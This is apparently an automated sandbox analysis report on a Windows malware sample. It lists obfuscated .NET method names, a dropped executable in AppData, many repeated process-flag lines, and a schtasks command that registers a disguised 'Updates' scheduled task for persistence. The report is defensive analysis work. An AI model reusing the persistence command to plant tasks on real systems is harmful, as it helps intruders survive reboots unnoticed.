Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, rG3ivKtFPkYayP4877.cs	High entropy of concatenated method names: 'AoNGwLuRdD', 'hsBGBEdKiK', 'j0nGWiYtI0', 'j6vGkuowhD', 'xN4GQRiqDs', 'duVGl4iTar', 'fE7ucvxtdWqVihhuLs', 'IZOHK7TQAB2X6nA8pB', 'Et6GGkrE1i', 'JE2Gnt5Lqf'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, a5vw6tPu7hcEKmEZZy.cs	High entropy of concatenated method names: 'AQyXGuUct7', 'eKXXno1YE3', 'jmkXu5EYVp', 'TngXYekLJd', 'SK7XEsDhAm', 'AroXgIKx8C', 'HdsX2dpW1v', 'WEHSJF00Bc', 'sH4SjTmHC0', 'WWVSUhmbZi'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, mKgtOOfgJSjP9ZL2Ml.cs	High entropy of concatenated method names: 'Dispose', 'WfYGUCr3e9', 'MK4RNFTZqv', 'lnQddblWij', 'MZRGbhZh0v', 'TbgGzneQYj', 'ProcessDialogKey', 'MerRCCLPhl', 'I6FRG3loMf', 'nOjRRSPvP4'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, o4ucp15D8ToPweuH8X.cs	High entropy of concatenated method names: 'hwgeOD2okP', 'f20exe5y19', 'xGherWUjkS', 'uCEepZkEYJ', 'YbbeQYE6Qo', 'LOMel319cj', 'v2meIuOOeB', 'd2heSChUpL', 'om1eXnQlUN', 'buneLNxtDb'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, vA0utDi6kalJK77o62.cs	High entropy of concatenated method names: 'ToString', 'cSDl0UZLXc', 'hVQlNLVKCI', 'TCNlDyPZUG', 'YdBlthYikk', 'HBdlZjyvfE', 'VZGl5NhByM', 'wFPl1RyHoD', 'gq0l7dQc0P', 'EQ4lsBXL09'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, I6XRnF4LP5JevZQ7NP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DA3RUPx6w4', 'VkPRbn50ij', 'L8eRzc3lam', 'kvunCGZE4v', 'rYwnGLdZBa', 'cnxnRlLJDX', 'zV5nn7A8dQ', 'a9BSgTji8UAfUhgACWL'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, L8Zd5QMXQQ43AtbYpO.cs	High entropy of concatenated method names: 'D3ZEqRT6BP', 'J9LEMyZaUn', 'AgOE3sNYTF', 'JjCEhLtQhP', 'RtmEFgBCGR', 'K8PEisHiMu', 'Mf7EJQrhjk', 'VwtEjWbPVM', 'G4IEUCZx04', 'BiQEbCPrMM'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, LST1w7z1Z4AxPZ1MSI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Oj4XoQ1TjF', 'XrVXQrsHbo', 'PudXlvSAed', 'Vn1XI8csdt', 'CpCXST1tvk', 'o85XXt8OAB', 'gwlXLIob3U'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, TckNgadhVo6yQFljfHj.cs	High entropy of concatenated method names: 'MYkXVPBTOF', 'LyIX6RIy8J', 'QY8XaTnuZ6', 'YsBXObsSe0', 'RWsX8jwIxv', 'MePXxJVXXk', 'eeWXKrDVU7', 'S33Xr1R8qo', 'wBBXpMTWdY', 'nXiX9ID3rb'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, ljk4duRsWmsI2jrfts.cs	High entropy of concatenated method names: 'WtDSHY9gLf', 'sR6SNI6HY1', 'HvjSDRCmwq', 'mPgStVHUJd', 'lGZSqrm0qA', 'xJFSZQgTDI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, Sjnl6VU2hM4EhJtoFJ.cs	High entropy of concatenated method names: 'S4Bg8dM60o', 'i7IgKhmltw', 'oS0eDycI2q', 'YXIetxxQEE', 'nMweZm7e9V', 'vQye5V2ff3', 'swWe19F8kQ', 'jNie7UxT8R', 'YLbesW52i1', 'fYhe4xfgf6'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, lbLTaRxgfXRGqTblEm.cs	High entropy of concatenated method names: 'eNgaMEdkH', 'JpNOOy81i', 'tnOxKGS1O', 'uPqKFxMD4', 'SFtps0bye', 'SA99bPNxE', 'B4qs6Gp6CMr84nYLfh', 'ptymZZCapnEu1aXO3X', 'QVMSrUUun', 'YsiLJIE9t'

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File created: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
